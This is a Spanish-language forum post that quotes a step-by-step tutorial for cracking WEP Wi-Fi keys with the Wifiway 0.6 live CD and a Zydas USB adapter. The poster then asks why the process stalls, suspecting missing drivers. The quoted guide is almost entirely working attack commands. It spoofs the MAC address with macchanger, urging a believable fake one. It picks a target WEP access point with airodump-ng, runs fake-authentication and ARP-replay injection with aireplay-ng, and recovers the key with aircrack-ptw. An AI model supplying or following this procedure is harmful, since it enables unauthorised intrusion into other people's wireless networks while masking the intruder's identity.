Muy buenas me baje el wifiway 0.6 siguiendo este manual:
Manual wifiway 0.6 y USB Zydas 1211b
*Arrancamos el LiveCD WIFIWAY,cuando aparezca un cuadro con la palabra GMT .Pulsamos enter.
*Nos sale <LOCALTIME. Pulsamos enter.
*Sale un cuadro para el idioma, buscamos con el tabulador SPANIS ISO 8859-1 .Pulsamos enter.
*En el siguiente, volvemos a pulsar enter.
*En la siguiente pantalla tecleamos la palabra startx
*Empieza a cargarse el programa y sale la pantalla inicial.
*Conectamos la USB al PC.
*Localizacion de la tarjeta
Paso-1/1
Abrimos un terminal y tecleamos:
iwconfig
Localizo donde aparece mi USB (en este caso es eth2)En todos los pasos de este tutorial donde aparece eth2 cada cual que escriba el sitio donde aparezca su tarjeta, bien sea < lo >,< eth >,< eth1 > ó < eth2 >
lo no wireless extensions
eth no wireless extensions
eth1 no wireless extensions
eth2 EEE 802.11b/g ESSID: pf/any NIckname : "zd1211b" Encryption key :of
Link Quality:0 Signel level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon: 0
si no os aparece nada sobre vuestra usb ó tarjeta, es que esta down y hay que ponerla up y se pone con el siguiente comando:
ifconfig eth2 up
*Cambio de nuestra MAC. (No es necesario, pero…)
Paso-2
Abrimos otro terminal y tecleamos:
macchanger -m 00:11:22:33:44:55 eth2 (00:11:22:33:44:55 es imaginaria y claramente falsa poned una que sea creible)
Esto es para cambiar nuestra MAC.Ahora nuestra MAC aparecerá con la numeración que hemos
metido 00:11:22:33:44:55
*Escaneado de APs
Paso-1/2
Volvemos al terminal del Paso-1 y tecleamos:
airodump-ng eth2
Una vez aparezcan los BSSID anotamos el que nos interesa (siempre que sea wep) pulsamos CTRL+C para parar el proceso.
Paso-1/3
tecleamos:
airodump-ng -c 6 -w (nombre que sea) eth2
En este paso se crea un archivo donde se guardaran todos los paquetes recibidos cuando lancemos el ataque, a la vez que solo aparecen los APs del canal seleccionado en este caso está marcado con el canal 6.
*Asociación con el AP.
Paso-3
Abrimos otro terminal y tecleamos:
aireplay-ng -1 0 -e WLAN_XX -a XX:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 eth2
Si el nivel de señal no es relativamente bueno, no asocia. Es cuestión de mover la antena o el usb viendo
dónde coge mejor la señal que te interese, y de tener paciencia.
Puedes probar la opción -o. A veces funciona mejor:
aireplay-ng -1 30 -o 1 -e WLAN_XX -a XX:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 eth2
*Ataque
Paso -4
Abrimos otro terminal y tecleamos:
aireplay-ng -3 -b XX:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 eth2
Hecho esto los paquetes(#Data) en la terminal donde tenemos al airodump deberán de empezar a subir para
el Access Point elegido. Esperamos a que junte un mínimo de 30,000 #Data. Cuando esté por encima de ese valor, ejecutamos:
*Resolución
Paso-5
aircrack-ptw (nombre que sea)-01.cap
En unos instantes te deberá aparecer la clave, en el renglón que diga Found Key. Si no aparece
espera a que junte más paquetes y vuelve a ejecutar este último comando.
Puede llegar a requerir hasta 100,000 o más.
(El orden sería.... 1º localizar el USB; 2º cambio de MAC; 3º airodump-ng, 4º aireplay-ng, 5º aircrack)
Hago los primeros pasos, me detecta la tarjeta, hasta querer cambiar la Mac empezar a escanear aps.
Unas capturas:
Las pongo en breve.
No he consegido instala los drivers, puede se que falle por eso=?